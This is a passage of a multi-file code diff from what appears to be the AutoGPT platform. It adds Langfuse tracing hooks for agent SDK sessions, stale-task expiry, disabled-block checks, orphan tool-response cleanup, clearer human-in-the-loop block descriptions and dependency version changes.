logger.debug(f"[Tracing] Failed to log SDK message: {e}")
|
||||||
|
|
||||||
|
def _log_result(self, result: ResultMessage) -> None:
|
||||||
|
"""Log the final result with usage and cost."""
|
||||||
|
if not self.enabled or not self._trace:
|
||||||
|
return
|
||||||
|
|
||||||
|
try:
|
||||||
|
# Extract usage info
|
||||||
|
usage = result.usage or {}
|
||||||
|
metadata: dict[str, Any] = {
|
||||||
|
"duration_ms": result.duration_ms,
|
||||||
|
"duration_api_ms": result.duration_api_ms,
|
||||||
|
"num_turns": result.num_turns,
|
||||||
|
"is_error": result.is_error,
|
||||||
|
}
|
||||||
|
|
||||||
|
if result.total_cost_usd is not None:
|
||||||
|
metadata["cost_usd"] = result.total_cost_usd
|
||||||
|
|
||||||
|
if usage:
|
||||||
|
metadata["usage"] = usage
|
||||||
|
|
||||||
|
self._trace.update(metadata=metadata)
|
||||||
|
|
||||||
|
# Log as a generation for proper Langfuse cost/usage tracking
|
||||||
|
if usage or result.total_cost_usd:
|
||||||
|
self._trace.generation(
|
||||||
|
name="claude-sdk-completion",
|
||||||
|
model="claude-sonnet-4-20250514", # SDK default model
|
||||||
|
usage=(
|
||||||
|
{
|
||||||
|
"input": usage.get("input_tokens", 0),
|
||||||
|
"output": usage.get("output_tokens", 0),
|
||||||
|
"total": usage.get("input_tokens", 0)
|
||||||
|
+ usage.get("output_tokens", 0),
|
||||||
|
}
|
||||||
|
if usage
|
||||||
|
else None
|
||||||
|
),
|
||||||
|
metadata={"cost_usd": result.total_cost_usd},
|
||||||
|
)
|
||||||
|
|
||||||
|
logger.debug(
|
||||||
|
f"[Tracing] Logged result: {result.num_turns} turns, "
|
||||||
|
f"${result.total_cost_usd:.4f} cost"
|
||||||
|
if result.total_cost_usd
|
||||||
|
else f"[Tracing] Logged result: {result.num_turns} turns"
|
||||||
|
)
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
logger.debug(f"[Tracing] Failed to log result: {e}")
|
||||||
|
|
||||||
|
def _finalize_current_generation(self) -> None:
|
||||||
|
"""Mark the current generation as complete."""
|
||||||
|
if self._current_generation:
|
||||||
|
self._current_generation.end_time = time.perf_counter()
|
||||||
|
self._current_generation = None
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def _extract_tool_output(content: str | list[dict[str, str]] | None) -> str:
|
||||||
|
"""Extract string output from tool result content."""
|
||||||
|
if isinstance(content, str):
|
||||||
|
return content
|
||||||
|
if isinstance(content, list):
|
||||||
|
parts = [
|
||||||
|
item.get("text", "") for item in content if item.get("type") == "text"
|
||||||
|
]
|
||||||
|
return "".join(parts) if parts else str(content)
|
||||||
|
return str(content) if content else ""
|
||||||
|
|
||||||
|
|
||||||
|
@asynccontextmanager
|
||||||
|
async def traced_session(
|
||||||
|
session_id: str,
|
||||||
|
user_id: str | None = None,
|
||||||
|
system_prompt: str | None = None,
|
||||||
|
):
|
||||||
|
"""Convenience async context manager for tracing SDK sessions.
|
||||||
|
|
||||||
|
Usage:
|
||||||
|
async with traced_session(session_id, user_id) as tracer:
|
||||||
|
tracer.log_user_message(message)
|
||||||
|
async for msg in client.receive_messages():
|
||||||
|
tracer.log_sdk_message(msg)
|
||||||
|
"""
|
||||||
|
tracer = TracedSession(session_id, user_id, system_prompt)
|
||||||
|
async with tracer:
|
||||||
|
yield tracer
|
||||||
|
|
||||||
|
|
||||||
|
def create_tracing_hooks(tracer: TracedSession) -> dict[str, Any]:
|
||||||
|
"""Create SDK hooks for fine-grained Langfuse tracing.
|
||||||
|
|
||||||
|
These hooks capture precise timing for tool executions and failures
|
||||||
|
that may not be visible in the message stream.
|
||||||
|
|
||||||
|
Designed to be merged with security hooks:
|
||||||
|
hooks = {**security_hooks, **create_tracing_hooks(tracer)}
|
||||||
|
|
||||||
|
Args:
|
||||||
|
tracer: The active TracedSession instance
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Hooks configuration dict for ClaudeAgentOptions
|
||||||
|
"""
|
||||||
|
if not tracer.enabled:
|
||||||
|
return {}
|
||||||
|
|
||||||
|
try:
|
||||||
|
from claude_agent_sdk import HookMatcher
|
||||||
|
from claude_agent_sdk.types import HookContext, HookInput, SyncHookJSONOutput
|
||||||
|
|
||||||
|
async def trace_pre_tool_use(
|
||||||
|
input_data: HookInput,
|
||||||
|
tool_use_id: str | None,
|
||||||
|
context: HookContext,
|
||||||
|
) -> SyncHookJSONOutput:
|
||||||
|
"""Record tool start time for accurate duration tracking."""
|
||||||
|
_ = context
|
||||||
|
if not tool_use_id:
|
||||||
|
return {}
|
||||||
|
tool_name = str(input_data.get("tool_name", "unknown"))
|
||||||
|
tool_input = input_data.get("tool_input", {})
|
||||||
|
|
||||||
|
# Record start time in pending tools
|
||||||
|
tracer._pending_tools[tool_use_id] = ToolSpan(
|
||||||
|
tool_call_id=tool_use_id,
|
||||||
|
tool_name=tool_name,
|
||||||
|
input=tool_input if isinstance(tool_input, dict) else {},
|
||||||
|
)
|
||||||
|
return {}
|
||||||
|
|
||||||
|
async def trace_post_tool_use(
|
||||||
|
input_data: HookInput,
|
||||||
|
tool_use_id: str | None,
|
||||||
|
context: HookContext,
|
||||||
|
) -> SyncHookJSONOutput:
|
||||||
|
"""Record tool completion for duration calculation."""
|
||||||
|
_ = context
|
||||||
|
if tool_use_id and tool_use_id in tracer._pending_tools:
|
||||||
|
tracer._pending_tools[tool_use_id].end_time = time.perf_counter()
|
||||||
|
tracer._pending_tools[tool_use_id].success = True
|
||||||
|
return {}
|
||||||
|
|
||||||
|
async def trace_post_tool_failure(
|
||||||
|
input_data: HookInput,
|
||||||
|
tool_use_id: str | None,
|
||||||
|
context: HookContext,
|
||||||
|
) -> SyncHookJSONOutput:
|
||||||
|
"""Record tool failures for error tracking."""
|
||||||
|
_ = context
|
||||||
|
if tool_use_id and tool_use_id in tracer._pending_tools:
|
||||||
|
tracer._pending_tools[tool_use_id].end_time = time.perf_counter()
|
||||||
|
tracer._pending_tools[tool_use_id].success = False
|
||||||
|
error = input_data.get("error", "Unknown error")
|
||||||
|
tracer._pending_tools[tool_use_id].output = f"ERROR: {error}"
|
||||||
|
return {}
|
||||||
|
|
||||||
|
return {
|
||||||
|
"PreToolUse": [HookMatcher(matcher="*", hooks=[trace_pre_tool_use])],
|
||||||
|
"PostToolUse": [HookMatcher(matcher="*", hooks=[trace_post_tool_use])],
|
||||||
|
"PostToolUseFailure": [
|
||||||
|
HookMatcher(matcher="*", hooks=[trace_post_tool_failure])
|
||||||
|
],
|
||||||
|
}
|
||||||
|
|
||||||
|
except ImportError:
|
||||||
|
logger.debug("[Tracing] SDK not available for hook-based tracing")
|
||||||
|
return {}
|
||||||
|
|
||||||
|
|
||||||
|
def merge_hooks(*hook_dicts: dict[str, Any]) -> dict[str, Any]:
|
||||||
|
"""Merge multiple hook configurations into one.
|
||||||
|
|
||||||
|
Combines hook matchers for the same event type, allowing both
|
||||||
|
security and tracing hooks to coexist.
|
||||||
|
|
||||||
|
Usage:
|
||||||
|
combined = merge_hooks(security_hooks, tracing_hooks)
|
||||||
|
"""
|
||||||
|
result: dict[str, list[Any]] = {}
|
||||||
|
for hook_dict in hook_dicts:
|
||||||
|
for event_name, matchers in hook_dict.items():
|
||||||
|
if event_name not in result:
|
||||||
|
result[event_name] = []
|
||||||
|
result[event_name].extend(matchers)
|
||||||
|
return result
|
||||||
@@ -245,12 +245,16 @@ async def _get_system_prompt_template(context: str) -> str:
|
|||||||
return DEFAULT_SYSTEM_PROMPT.format(users_information=context)
|
return DEFAULT_SYSTEM_PROMPT.format(users_information=context)
|
||||||
|
|
||||||
|
|
||||||
async def _build_system_prompt(user_id: str | None) -> tuple[str, Any]:
|
async def _build_system_prompt(
|
||||||
|
user_id: str | None, has_conversation_history: bool = False
|
||||||
|
) -> tuple[str, Any]:
|
||||||
"""Build the full system prompt including business understanding if available.
|
"""Build the full system prompt including business understanding if available.
|
||||||
|
|
||||||
Args:
|
Args:
|
||||||
user_id: The user ID for fetching business understanding
|
user_id: The user ID for fetching business understanding.
|
||||||
If "default" and this is the user's first session, will use "onboarding" instead.
|
has_conversation_history: Whether there's existing conversation history.
|
||||||
|
If True, we don't tell the model to greet/introduce (since they're
|
||||||
|
already in a conversation).
|
||||||
|
|
||||||
Returns:
|
Returns:
|
||||||
Tuple of (compiled prompt string, business understanding object)
|
Tuple of (compiled prompt string, business understanding object)
|
||||||
@@ -266,6 +270,8 @@ async def _build_system_prompt(user_id: str | None) -> tuple[str, Any]:
|
|||||||
|
|
||||||
if understanding:
|
if understanding:
|
||||||
context = format_understanding_for_prompt(understanding)
|
context = format_understanding_for_prompt(understanding)
|
||||||
|
elif has_conversation_history:
|
||||||
|
context = "No prior understanding saved yet. Continue the existing conversation naturally."
|
||||||
else:
|
else:
|
||||||
context = "This is the first time you are meeting the user. Greet them and introduce them to the platform"
|
context = "This is the first time you are meeting the user. Greet them and introduce them to the platform"
|
||||||
|
|
||||||
@@ -374,7 +380,6 @@ async def stream_chat_completion(
|
|||||||
|
|
||||||
Raises:
|
Raises:
|
||||||
NotFoundError: If session_id is invalid
|
NotFoundError: If session_id is invalid
|
||||||
ValueError: If max_context_messages is exceeded
|
|
||||||
|
|
||||||
"""
|
"""
|
||||||
completion_start = time.monotonic()
|
completion_start = time.monotonic()
|
||||||
@@ -459,8 +464,9 @@ async def stream_chat_completion(
|
|||||||
|
|
||||||
# Generate title for new sessions on first user message (non-blocking)
|
# Generate title for new sessions on first user message (non-blocking)
|
||||||
# Check: is_user_message, no title yet, and this is the first user message
|
# Check: is_user_message, no title yet, and this is the first user message
|
||||||
if is_user_message and message and not session.title:
|
user_messages = [m for m in session.messages if m.role == "user"]
|
||||||
user_messages = [m for m in session.messages if m.role == "user"]
|
first_user_msg = message or (user_messages[0].content if user_messages else None)
|
||||||
|
if is_user_message and first_user_msg and not session.title:
|
||||||
if len(user_messages) == 1:
|
if len(user_messages) == 1:
|
||||||
# First user message - generate title in background
|
# First user message - generate title in background
|
||||||
import asyncio
|
import asyncio
|
||||||
@@ -468,7 +474,7 @@ async def stream_chat_completion(
|
|||||||
# Capture only the values we need (not the session object) to avoid
|
# Capture only the values we need (not the session object) to avoid
|
||||||
# stale data issues when the main flow modifies the session
|
# stale data issues when the main flow modifies the session
|
||||||
captured_session_id = session_id
|
captured_session_id = session_id
|
||||||
captured_message = message
|
captured_message = first_user_msg
|
||||||
captured_user_id = user_id
|
captured_user_id = user_id
|
||||||
|
|
||||||
async def _update_title():
|
async def _update_title():
|
||||||
@@ -1233,7 +1239,7 @@ async def _stream_chat_chunks(
|
|||||||
|
|
||||||
total_time = (time_module.perf_counter() - stream_chunks_start) * 1000
|
total_time = (time_module.perf_counter() - stream_chunks_start) * 1000
|
||||||
logger.info(
|
logger.info(
|
||||||
f"[TIMING] _stream_chat_chunks COMPLETED in {total_time/1000:.1f}s; "
|
f"[TIMING] _stream_chat_chunks COMPLETED in {total_time / 1000:.1f}s; "
|
||||||
f"session={session.session_id}, user={session.user_id}",
|
f"session={session.session_id}, user={session.user_id}",
|
||||||
extra={"json_fields": {**log_meta, "total_time_ms": total_time}},
|
extra={"json_fields": {**log_meta, "total_time_ms": total_time}},
|
||||||
)
|
)
|
||||||
|
|||||||
@@ -814,6 +814,28 @@ async def get_active_task_for_session(
|
|||||||
if task_user_id and user_id != task_user_id:
|
if task_user_id and user_id != task_user_id:
|
||||||
continue
|
continue
|
||||||
|
|
||||||
|
# Auto-expire stale tasks that exceeded stream_timeout
|
||||||
|
created_at_str = meta.get("created_at", "")
|
||||||
|
if created_at_str:
|
||||||
|
try:
|
||||||
|
created_at = datetime.fromisoformat(created_at_str)
|
||||||
|
age_seconds = (
|
||||||
|
datetime.now(timezone.utc) - created_at
|
||||||
|
).total_seconds()
|
||||||
|
if age_seconds > config.stream_timeout:
|
||||||
|
logger.warning(
|
||||||
|
f"[TASK_LOOKUP] Auto-expiring stale task {task_id[:8]}... "
|
||||||
|
f"(age={age_seconds:.0f}s > timeout={config.stream_timeout}s)"
|
||||||
|
)
|
||||||
|
await mark_task_completed(task_id, "failed")
|
||||||
|
continue
|
||||||
|
except (ValueError, TypeError):
|
||||||
|
pass
|
||||||
|
|
||||||
|
logger.info(
|
||||||
|
f"[TASK_LOOKUP] Found running task {task_id[:8]}... for session {session_id[:8]}..."
|
||||||
|
)
|
||||||
|
|
||||||
# Get the last message ID from Redis Stream
|
# Get the last message ID from Redis Stream
|
||||||
stream_key = _get_task_stream_key(task_id)
|
stream_key = _get_task_stream_key(task_id)
|
||||||
last_id = "0-0"
|
last_id = "0-0"
|
||||||
|
|||||||
@@ -335,11 +335,17 @@ class BlockInfoSummary(BaseModel):
|
|||||||
name: str
|
name: str
|
||||||
description: str
|
description: str
|
||||||
categories: list[str]
|
categories: list[str]
|
||||||
input_schema: dict[str, Any]
|
input_schema: dict[str, Any] = Field(
|
||||||
output_schema: dict[str, Any]
|
default_factory=dict,
|
||||||
|
description="Full JSON schema for block inputs",
|
||||||
|
)
|
||||||
|
output_schema: dict[str, Any] = Field(
|
||||||
|
default_factory=dict,
|
||||||
|
description="Full JSON schema for block outputs",
|
||||||
|
)
|
||||||
required_inputs: list[BlockInputFieldInfo] = Field(
|
required_inputs: list[BlockInputFieldInfo] = Field(
|
||||||
default_factory=list,
|
default_factory=list,
|
||||||
description="List of required input fields for this block",
|
description="List of input fields for this block",
|
||||||
)
|
)
|
||||||
|
|
||||||
|
|
||||||
@@ -352,7 +358,7 @@ class BlockListResponse(ToolResponseBase):
|
|||||||
query: str
|
query: str
|
||||||
usage_hint: str = Field(
|
usage_hint: str = Field(
|
||||||
default="To execute a block, call run_block with block_id set to the block's "
|
default="To execute a block, call run_block with block_id set to the block's "
|
||||||
"'id' field and input_data containing the required fields from input_schema."
|
"'id' field and input_data containing the fields listed in required_inputs."
|
||||||
)
|
)
|
||||||
|
|
||||||
|
|
||||||
|
|||||||
@@ -21,43 +21,71 @@ logger = logging.getLogger(__name__)
|
|||||||
|
|
||||||
class HumanInTheLoopBlock(Block):
|
class HumanInTheLoopBlock(Block):
|
||||||
"""
|
"""
|
||||||
This block pauses execution and waits for human approval or modification of the data.
|
Pauses execution and waits for human approval or rejection of the data.
|
||||||
|
|
||||||
When executed, it creates a pending review entry and sets the node execution status
|
When executed, this block creates a pending review entry and sets the node execution
|
||||||
to REVIEW. The execution will remain paused until a human user either:
|
status to REVIEW. The execution remains paused until a human user either approves
|
||||||
- Approves the data (with or without modifications)
|
or rejects the data.
|
||||||
- Rejects the data
|
|
||||||
|
|
||||||
This is useful for workflows that require human validation or intervention before
|
**How it works:**
|
||||||
proceeding to the next steps.
|
- The input data is presented to a human reviewer
|
||||||
|
- The reviewer can approve or reject (and optionally modify the data if editable)
|
||||||
|
- On approval: the data flows out through the `approved_data` output pin
|
||||||
|
- On rejection: the data flows out through the `rejected_data` output pin
|
||||||
|
|
||||||
|
**Important:** The output pins yield the actual data itself, NOT status strings.
|
||||||
|
The approval/rejection decision determines WHICH output pin fires, not the value.
|
||||||
|
You do NOT need to compare the output to "APPROVED" or "REJECTED" - simply connect
|
||||||
|
downstream blocks to the appropriate output pin for each case.
|
||||||
|
|
||||||
|
**Example usage:**
|
||||||
|
- Connect `approved_data` → next step in your workflow (data was approved)
|
||||||
|
- Connect `rejected_data` → error handling or notification (data was rejected)
|
||||||
"""
|
"""
|
||||||
|
|
||||||
class Input(BlockSchemaInput):
|
class Input(BlockSchemaInput):
|
||||||
data: Any = SchemaField(description="The data to be reviewed by a human user")
|
data: Any = SchemaField(
|
||||||
|
description="The data to be reviewed by a human user. "
|
||||||
|
"This exact data will be passed through to either approved_data or "
|
||||||
|
"rejected_data output based on the reviewer's decision."
|
||||||
|
)
|
||||||
name: str = SchemaField(
|
name: str = SchemaField(
|
||||||
description="A descriptive name for what this data represents",
|
description="A descriptive name for what this data represents. "
|
||||||
|
"This helps the reviewer understand what they are reviewing.",
|
||||||
)
|
)
|
||||||
editable: bool = SchemaField(
|
editable: bool = SchemaField(
|
||||||
description="Whether the human reviewer can edit the data",
|
description="Whether the human reviewer can edit the data before "
|
||||||
|
"approving or rejecting it",
|
||||||
default=True,
|
default=True,
|
||||||
advanced=True,
|
advanced=True,
|
||||||
)
|
)
|
||||||
|
|
||||||
class Output(BlockSchemaOutput):
|
class Output(BlockSchemaOutput):
|
||||||
approved_data: Any = SchemaField(
|
approved_data: Any = SchemaField(
|
||||||
description="The data when approved (may be modified by reviewer)"
|
description="Outputs the input data when the reviewer APPROVES it. "
|
||||||
|
"The value is the actual data itself (not a status string like 'APPROVED'). "
|
||||||
|
"If the reviewer edited the data, this contains the modified version. "
|
||||||
|
"Connect downstream blocks here for the 'approved' workflow path."
|
||||||
)
|
)
|
||||||
rejected_data: Any = SchemaField(
|
rejected_data: Any = SchemaField(
|
||||||
description="The data when rejected (may be modified by reviewer)"
|
description="Outputs the input data when the reviewer REJECTS it. "
|
||||||
|
"The value is the actual data itself (not a status string like 'REJECTED'). "
|
||||||
|
"If the reviewer edited the data, this contains the modified version. "
|
||||||
|
"Connect downstream blocks here for the 'rejected' workflow path."
|
||||||
)
|
)
|
||||||
review_message: str = SchemaField(
|
review_message: str = SchemaField(
|
||||||
description="Any message provided by the reviewer", default=""
|
description="Optional message provided by the reviewer explaining their "
|
||||||
|
"decision. Only outputs when the reviewer provides a message; "
|
||||||
|
"this pin does not fire if no message was given.",
|
||||||
|
default="",
|
||||||
)
|
)
|
||||||
|
|
||||||
def __init__(self):
|
def __init__(self):
|
||||||
super().__init__(
|
super().__init__(
|
||||||
id="8b2a7b3c-6e9d-4a5f-8c1b-2e3f4a5b6c7d",
|
id="8b2a7b3c-6e9d-4a5f-8c1b-2e3f4a5b6c7d",
|
||||||
description="Pause execution and wait for human approval or modification of data",
|
description="Pause execution for human review. Data flows through "
|
||||||
|
"approved_data or rejected_data output based on the reviewer's decision. "
|
||||||
|
"Outputs contain the actual data, not status strings.",
|
||||||
categories={BlockCategory.BASIC},
|
categories={BlockCategory.BASIC},
|
||||||
input_schema=HumanInTheLoopBlock.Input,
|
input_schema=HumanInTheLoopBlock.Input,
|
||||||
output_schema=HumanInTheLoopBlock.Output,
|
output_schema=HumanInTheLoopBlock.Output,
|
||||||
|
|||||||
@@ -743,6 +743,11 @@ class GraphModel(Graph, GraphMeta):
|
|||||||
# For invalid blocks, we still raise immediately as this is a structural issue
|
# For invalid blocks, we still raise immediately as this is a structural issue
|
||||||
raise ValueError(f"Invalid block {node.block_id} for node #{node.id}")
|
raise ValueError(f"Invalid block {node.block_id} for node #{node.id}")
|
||||||
|
|
||||||
|
if block.disabled:
|
||||||
|
raise ValueError(
|
||||||
|
f"Block {node.block_id} is disabled and cannot be used in graphs"
|
||||||
|
)
|
||||||
|
|
||||||
node_input_mask = (
|
node_input_mask = (
|
||||||
nodes_input_masks.get(node.id, {}) if nodes_input_masks else {}
|
nodes_input_masks.get(node.id, {}) if nodes_input_masks else {}
|
||||||
)
|
)
|
||||||
|
|||||||
@@ -213,6 +213,9 @@ async def execute_node(
|
|||||||
block_name=node_block.name,
|
block_name=node_block.name,
|
||||||
)
|
)
|
||||||
|
|
||||||
|
if node_block.disabled:
|
||||||
|
raise ValueError(f"Block {node_block.id} is disabled and cannot be executed")
|
||||||
|
|
||||||
# Sanity check: validate the execution input.
|
# Sanity check: validate the execution input.
|
||||||
input_data, error = validate_exec(node, data.inputs, resolve_input=False)
|
input_data, error = validate_exec(node, data.inputs, resolve_input=False)
|
||||||
if input_data is None:
|
if input_data is None:
|
||||||
|
|||||||
@@ -364,6 +364,44 @@ def _remove_orphan_tool_responses(
|
|||||||
return result
|
return result
|
||||||
|
|
||||||
|
|
||||||
|
def validate_and_remove_orphan_tool_responses(
|
||||||
|
messages: list[dict],
|
||||||
|
log_warning: bool = True,
|
||||||
|
) -> list[dict]:
|
||||||
|
"""
|
||||||
|
Validate tool_call/tool_response pairs and remove orphaned responses.
|
||||||
|
|
||||||
|
Scans messages in order, tracking all tool_call IDs. Any tool response
|
||||||
|
referencing an ID not seen in a preceding message is considered orphaned
|
||||||
|
and removed. This prevents API errors like Anthropic's "unexpected tool_use_id".
|
||||||
|
|
||||||
|
Args:
|
||||||
|
messages: List of messages to validate (OpenAI or Anthropic format)
|
||||||
|
log_warning: Whether to log a warning when orphans are found
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
A new list with orphaned tool responses removed
|
||||||
|
"""
|
||||||
|
available_ids: set[str] = set()
|
||||||
|
orphan_ids: set[str] = set()
|
||||||
|
|
||||||
|
for msg in messages:
|
||||||
|
available_ids |= _extract_tool_call_ids_from_message(msg)
|
||||||
|
for resp_id in _extract_tool_response_ids_from_message(msg):
|
||||||
|
if resp_id not in available_ids:
|
||||||
|
orphan_ids.add(resp_id)
|
||||||
|
|
||||||
|
if not orphan_ids:
|
||||||
|
return messages
|
||||||
|
|
||||||
|
if log_warning:
|
||||||
|
logger.warning(
|
||||||
|
f"Removing {len(orphan_ids)} orphan tool response(s): {orphan_ids}"
|
||||||
|
)
|
||||||
|
|
||||||
|
return _remove_orphan_tool_responses(messages, orphan_ids)
|
||||||
|
|
||||||
|
|
||||||
def _ensure_tool_pairs_intact(
|
def _ensure_tool_pairs_intact(
|
||||||
recent_messages: list[dict],
|
recent_messages: list[dict],
|
||||||
all_messages: list[dict],
|
all_messages: list[dict],
|
||||||
@@ -723,6 +761,13 @@ async def compress_context(
|
|||||||
|
|
||||||
# Filter out any None values that may have been introduced
|
# Filter out any None values that may have been introduced
|
||||||
final_msgs: list[dict] = [m for m in msgs if m is not None]
|
final_msgs: list[dict] = [m for m in msgs if m is not None]
|
||||||
|
|
||||||
|
# ---- STEP 6: Final tool-pair validation ---------------------------------
|
||||||
|
# After all compression steps, verify that every tool response has a
|
||||||
|
# matching tool_call in a preceding assistant message. Remove orphans
|
||||||
|
# to prevent API errors (e.g., Anthropic's "unexpected tool_use_id").
|
||||||
|
final_msgs = validate_and_remove_orphan_tool_responses(final_msgs)
|
||||||
|
|
||||||
final_count = sum(_msg_tokens(m, enc) for m in final_msgs)
|
final_count = sum(_msg_tokens(m, enc) for m in final_msgs)
|
||||||
error = None
|
error = None
|
||||||
if final_count + reserve > target_tokens:
|
if final_count + reserve > target_tokens:
|
||||||
|
|||||||
850
autogpt_platform/backend/poetry.lock
generated
850
autogpt_platform/backend/poetry.lock
generated
File diff suppressed because it is too large
Load Diff
@@ -11,15 +11,16 @@ packages = [{ include = "backend", format = "sdist" }]
|
|||||||
python = ">=3.10,<3.14"
|
python = ">=3.10,<3.14"
|
||||||
aio-pika = "^9.5.5"
|
aio-pika = "^9.5.5"
|
||||||
aiohttp = "^3.10.0"
|
aiohttp = "^3.10.0"
|
||||||
aiodns = "^4.0.0"
|
aiodns = "^3.5.0"
|
||||||
anthropic = "^0.79.0"
|
anthropic = "^0.79.0"
|
||||||
apscheduler = "^3.11.1"
|
apscheduler = "^3.11.1"
|
||||||
autogpt-libs = { path = "../autogpt_libs", develop = true }
|
autogpt-libs = { path = "../autogpt_libs", develop = true }
|
||||||
bleach = { extras = ["css"], version = "^6.2.0" }
|
bleach = { extras = ["css"], version = "^6.2.0" }
|
||||||
|
claude-agent-sdk = "^0.1.0"
|
||||||
click = "^8.2.0"
|
click = "^8.2.0"
|
||||||
cryptography = "^46.0"
|
cryptography = "^46.0"
|
||||||
discord-py = "^2.5.2"
|
discord-py = "^2.5.2"
|
||||||
e2b-code-interpreter = "^2.4.1"
|
e2b-code-interpreter = "^1.5.2"
|
||||||
elevenlabs = "^1.50.0"
|
elevenlabs = "^1.50.0"
|
||||||
fastapi = "^0.128.6"
|
fastapi = "^0.128.6"
|
||||||
feedparser = "^6.0.11"
|
feedparser = "^6.0.11"
|
||||||
@@ -29,7 +30,7 @@ google-auth-oauthlib = "^1.2.2"
|
|||||||
google-cloud-storage = "^3.2.0"
|
google-cloud-storage = "^3.2.0"
|
||||||
googlemaps = "^4.10.0"
|
googlemaps = "^4.10.0"
|
||||||
gravitasml = "^0.1.4"
|
gravitasml = "^0.1.4"
|
||||||
groq = "^1.0.0"
|
groq = "^0.30.0"
|
||||||
html2text = "^2024.2.26"
|
html2text = "^2024.2.26"
|
||||||
jinja2 = "^3.1.6"
|
jinja2 = "^3.1.6"
|
||||||
jsonref = "^1.1.0"
|
jsonref = "^1.1.0"
|
||||||
@@ -58,21 +59,21 @@ pytest = "^8.4.1"
|
|||||||
pytest-asyncio = "^1.1.0"
|
pytest-asyncio = "^1.1.0"
|
||||||
python-dotenv = "^1.1.1"
|
python-dotenv = "^1.1.1"
|
||||||
python-multipart = "^0.0.22"
|
python-multipart = "^0.0.22"
|
||||||
redis = "^7.1.1"
|
redis = "^6.2.0"
|
||||||
regex = "^2025.9.18"
|
regex = "^2025.9.18"
|
||||||
replicate = "^1.0.6"
|
replicate = "^1.0.6"
|
||||||
sentry-sdk = {extras = ["anthropic", "fastapi", "launchdarkly", "openai", "sqlalchemy"], version = "^2.44.0"}
|
sentry-sdk = {extras = ["anthropic", "fastapi", "launchdarkly", "openai", "sqlalchemy"], version = "^2.44.0"}
|
||||||
sqlalchemy = "^2.0.40"
|
sqlalchemy = "^2.0.40"
|
||||||
strenum = "^0.4.9"
|
strenum = "^0.4.9"
|
||||||
stripe = "^11.5.0"
|
stripe = "^11.5.0"
|
||||||
supabase = "2.28.0"
|
supabase = "2.27.3"
|
||||||
tenacity = "^9.1.4"
|
tenacity = "^9.1.4"
|
||||||
todoist-api-python = "^3.2.1"
|
todoist-api-python = "^2.1.7"
|
||||||
tweepy = "^4.16.0"
|
tweepy = "^4.16.0"
|
||||||
uvicorn = { extras = ["standard"], version = "^0.40.0" }
|
uvicorn = { extras = ["standard"], version = "^0.40.0" }
|
||||||
websockets = "^15.0"
|
websockets = "^15.0"
|
||||||
youtube-transcript-api = "^1.2.1"
|
youtube-transcript-api = "^1.2.1"
|
||||||
yt-dlp = "2026.2.4"
|
yt-dlp = "2025.12.08"
|
||||||
zerobouncesdk = "^1.1.2"
|
zerobouncesdk = "^1.1.2"
|
||||||
# NOTE: please insert new dependencies in their alphabetical location
|
# NOTE: please insert new dependencies in their alphabetical location
|
||||||
pytest-snapshot = "^0.9.0"
|
pytest-snapshot = "^0.9.0"
|
||||||
@@ -85,7 +86,7 @@ pandas = "^2.3.1"
|
|||||||
firecrawl-py = "^4.3.6"
|
firecrawl-py = "^4.3.6"
|
||||||
exa-py = "^1.14.20"
|
exa-py = "^1.14.20"
|
||||||
croniter = "^6.0.0"
|
croniter = "^6.0.0"
|
||||||
stagehand = "^3.5.0"
|
stagehand = "^0.5.1"
|
||||||
gravitas-md2gdocs = "^0.1.0"
|
gravitas-md2gdocs = "^0.1.0"
|
||||||
posthog = "^7.6.0"
|
posthog = "^7.6.0"
|
||||||
|
|
||||||
@@ -94,7 +95,7 @@ aiohappyeyeballs = "^2.6.1"
|
|||||||
black = "^24.10.0"
|
black = "^24.10.0"
|
||||||
faker = "^38.2.0"
|
faker = "^38.2.0"
|
||||||
httpx = "^0.28.1"
|
httpx = "^0.28.1"
|
||||||
isort = "^7.0.0"
|
isort = "^5.13.2"
|
||||||
poethepoet = "^0.41.0"
|
poethepoet = "^0.41.0"
|
||||||
pre-commit = "^4.4.0"
|
pre-commit = "^4.4.0"
|
||||||
pyright = "^1.1.407"
|
pyright = "^1.1.407"
|
||||||
|
|||||||
@@ -10,8 +10,9 @@ import {
|
|||||||
MessageResponse,
|
MessageResponse,
|
||||||
} from "@/components/ai-elements/message";
|
} from "@/components/ai-elements/message";
|
||||||
import { LoadingSpinner } from "@/components/atoms/LoadingSpinner/LoadingSpinner";
|
import { LoadingSpinner } from "@/components/atoms/LoadingSpinner/LoadingSpinner";
|
||||||
|
import { toast } from "@/components/molecules/Toast/use-toast";
|
||||||
import { ToolUIPart, UIDataTypes, UIMessage, UITools } from "ai";
|
import { ToolUIPart, UIDataTypes, UIMessage, UITools } from "ai";
|
||||||
import { useEffect, useState } from "react";
|
import { useEffect, useRef, useState } from "react";
|
||||||
import { CreateAgentTool } from "../../tools/CreateAgent/CreateAgent";
|
import { CreateAgentTool } from "../../tools/CreateAgent/CreateAgent";
|
||||||
import { EditAgentTool } from "../../tools/EditAgent/EditAgent";
|
import { EditAgentTool } from "../../tools/EditAgent/EditAgent";
|
||||||
import { FindAgentsTool } from "../../tools/FindAgents/FindAgents";
|
import { FindAgentsTool } from "../../tools/FindAgents/FindAgents";
|
||||||
@@ -19,6 +20,7 @@ import { FindBlocksTool } from "../../tools/FindBlocks/FindBlocks";
|
|||||||
import { RunAgentTool } from "../../tools/RunAgent/RunAgent";
|
import { RunAgentTool } from "../../tools/RunAgent/RunAgent";
|
||||||
import { RunBlockTool } from "../../tools/RunBlock/RunBlock";
|
import { RunBlockTool } from "../../tools/RunBlock/RunBlock";
|
||||||
import { SearchDocsTool } from "../../tools/SearchDocs/SearchDocs";
|
import { SearchDocsTool } from "../../tools/SearchDocs/SearchDocs";
|
||||||
|
import { GenericTool } from "../../tools/GenericTool/GenericTool";
|
||||||
import { ViewAgentOutputTool } from "../../tools/ViewAgentOutput/ViewAgentOutput";
|
import { ViewAgentOutputTool } from "../../tools/ViewAgentOutput/ViewAgentOutput";
|
||||||
|
|
||||||
// ---------------------------------------------------------------------------
|
// ---------------------------------------------------------------------------
|
||||||
@@ -121,6 +123,7 @@ export const ChatMessagesContainer = ({
|
|||||||
isLoading,
|
isLoading,
|
||||||
}: ChatMessagesContainerProps) => {
|
}: ChatMessagesContainerProps) => {
|
||||||
const [thinkingPhrase, setThinkingPhrase] = useState(getRandomPhrase);
|
const [thinkingPhrase, setThinkingPhrase] = useState(getRandomPhrase);
|
||||||
|
const lastToastTimeRef = useRef(0);
|
||||||
|
|
